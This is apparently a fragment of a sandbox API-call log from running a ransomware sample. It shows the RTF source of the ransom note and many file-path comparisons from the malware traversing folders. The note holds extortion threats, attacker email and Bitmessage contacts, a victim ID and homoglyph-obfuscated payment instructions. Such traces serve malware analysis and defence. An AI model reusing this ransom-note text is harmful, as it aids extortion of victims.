w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ee8a78, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nªV\x9a\x1d0Q²e\x02ï|O\x18·\x91\x0f\x92Î\x12µK\x16Õ3\x1e", lpUsedDefaultChar=0x0) returned 8717 [0269.802] WriteFile (in: hFile=0x284, lpBuffer=0x1ee8a78*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ee8a78*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0269.802] CloseHandle (hObject=0x284) returned 1 [0269.802] Sleep (dwMilliseconds=0x3e8) [0271.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\", cchCount2=53) returned 3 [0271.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\", cchCount1=53, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\Cache\\", cchCount2=73) returned 1 [0271.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\Cache\\", cchCount2=73) returned 3 [0271.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\Cache\\", cchCount1=73, lpString2="C:\\ProgramData\\USOShared\\Logs\\", cchCount2=30) returned 3 [0271.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\", cchCount1=53, lpString2="C:\\ProgramData\\USOShared\\Logs\\", cchCount2=30) returned 3 [0271.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\", cchCount1=53, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 1 [0271.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\Cache\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 1 [0271.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 3 [0271.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\Cache\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\", cchCount2=59) returned 3 [0271.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\USOShared\\Logs\\", cchCount1=30, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\", cchCount2=59) returned 1 [0271.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\", cchCount1=53, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\", cchCount2=59) returned 1 [0271.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\", cchCount1=59, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\", cchCount2=67) returned 1 [0271.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\", cchCount2=67) returned 3 [0271.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\Cache\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\", cchCount2=67) returned 3 [0271.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\", cchCount1=67, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 1 [0271.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 2 [0271.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\", cchCount1=67, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 1 [0271.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 2 [0271.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\", cchCount1=67, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\", cchCount2=79) returned 3 [0271.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\", cchCount1=53, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\", cchCount2=79) returned 3 [0271.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\USOShared\\Logs\\", cchCount1=30, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\", cchCount2=79) returned 1 [0271.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\", cchCount1=59, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 1 [0271.252] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\Cache\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 1 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount2=74) returned 2 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\", cchCount1=59, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\", cchCount2=130) returned 1 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\Cache\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\", cchCount2=130) returned 1 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", cchCount1=74, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\", cchCount2=130) returned 1 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\zh_TW\\", cchCount1=133, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\", cchCount2=130) returned 1 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\AcroCef\\DC\\Acrobat\\Cache\\", cchCount1=67, lpString2="C:\\Users\\All Users\\Microsoft\\MF\\", cchCount2=32) returned 3 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\", cchCount1=79, lpString2="C:\\Users\\All Users\\Microsoft\\MF\\", cchCount2=32) returned 1 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\", cchCount1=53, lpString2="C:\\Users\\All Users\\Microsoft\\MF\\", cchCount2=32) returned 3 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\", cchCount1=59, lpString2="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\", cchCount2=72) returned 3 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\", cchCount1=79, lpString2="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\", cchCount2=72) returned 1 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\MF\\", cchCount1=32, lpString2="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\", cchCount2=72) returned 1 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\", cchCount1=53, lpString2="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\", cchCount2=72) returned 3 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\Cache\\", cchCount1=59, lpString2="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\", cchCount2=47) returned 3 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\MF\\", cchCount1=32, lpString2="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\", cchCount2=47) returned 1 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\Vault\\AC658CB4-9126-49BD-B877-31EEDAB3F204\\", cchCount1=72, lpString2="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\", cchCount2=47) returned 1 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\", cchCount1=53, lpString2="C:\\Users\\All Users\\regid.1991-06.com.microsoft\\", cchCount2=47) returned 3 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Adobe\\Acrobat\\DC\\", cchCount1=53, lpString2="C:\\Users\\All Users\\USOShared\\Logs\\", cchCount2=34) returned 3 [0271.253] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\All Users\\Microsoft\\MF\\", cchCount1=32, lpString2="C:\\Users\\All Users\\USOShared\\Logs\\", cchCount2=34) returned 1 [0271.253] CompareStringW (Locale=0x400, 